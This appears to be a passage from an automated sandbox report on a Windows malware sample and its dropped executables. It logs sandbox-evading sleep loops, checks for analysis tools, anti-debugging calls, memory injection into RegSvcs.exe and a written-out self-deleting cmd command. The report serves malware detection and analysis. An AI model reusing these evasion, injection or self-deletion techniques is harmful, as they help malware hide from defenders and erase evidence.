                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\konked\lecheries.exe; API/Special instruction interceptor: Address: 1982204
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; API/Special instruction interceptor: Address: 1600454
Source: 8kDIr4ZdNj.exe, 00000000.00000002.2156067931.0000000001589000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCMON.EXE
Source: lecheries.exe, 00000008.00000002.2297579381.0000000001680000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCMON.EXEZ
Source: lecheries.exe, 00000002.00000002.2179170223.0000000001948000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXEORKC
Source: lecheries.exe, 00000008.00000003.2285714993.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2284789709.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2273808754.00000000015E4000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2277160150.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2283398441.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000002.2297331239.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2285329196.0000000001607000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE:
Source: 8kDIr4ZdNj.exe, 00000000.00000002.2155415967.00000000014B8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXEAMS
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Memory allocated: 3000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Memory allocated: 5000000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599288
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599172
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 599062
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598944
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598391
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598172
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597278
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596842
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596622
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 596117
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595877
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595404
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594840
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594732
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594624
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594515
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594295
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594187
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Thread delayed: delay time: 594042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Window / User API: threadDelayed 3032
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Window / User API: threadDelayed 6807
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Evaded block: after key decision
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-102647)
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 3392; Thread sleep count: 3032 > 30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 3392; Thread sleep count: 6807 > 30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599288s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -599062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598944s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597278s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596622s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -596117s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595877s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595404s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594840s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594732s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424; Thread sleep time: -594042s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008F445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_00BC445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ED13F40 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ED06B00 GetProcAddress,FindFirstFileA,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ECE0520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ED12190 FindFirstFileA,FindClose,FindWindowA
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: EmbeddedExe1.exe, 00000005.00000002.3395288649.000002991F60B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: EmbeddedExe2.exe, 00000006.00000002.2303172774.00000000012D3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; API call chain: ExitProcess graph end node (graph_0-101361)
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_00903F09 BlockInput
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_00893B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_00894B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_01500888 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_01501F08 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_01501EA8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_019824D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_01982470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_01980E50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 8_2_016006C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 8_2_01600720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 8_2_015FF0A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008BA124 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe; Code function: 0_2_008BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_00B8A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\konked\lecheries.exe; Code function: 2_2_00B8A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ED6AC78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe; Code function: 5_2_00007FF75ED84664 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4DD008
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D31008
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E87B1 LogonUserW,0_2_008E87B1
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00893B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00893B3A
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008948D7
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008F4C27 mouse_event,0_2_008F4C27
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\8kDIr4ZdNj.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\konked\lecheries.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\lecheries.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008E7CAF
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008E874B
Source: 8kDIr4ZdNj.exe, lecheries.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 8kDIr4ZdNj.exe, lecheries.exe | Binary or memory string: Shell_TrayWnd
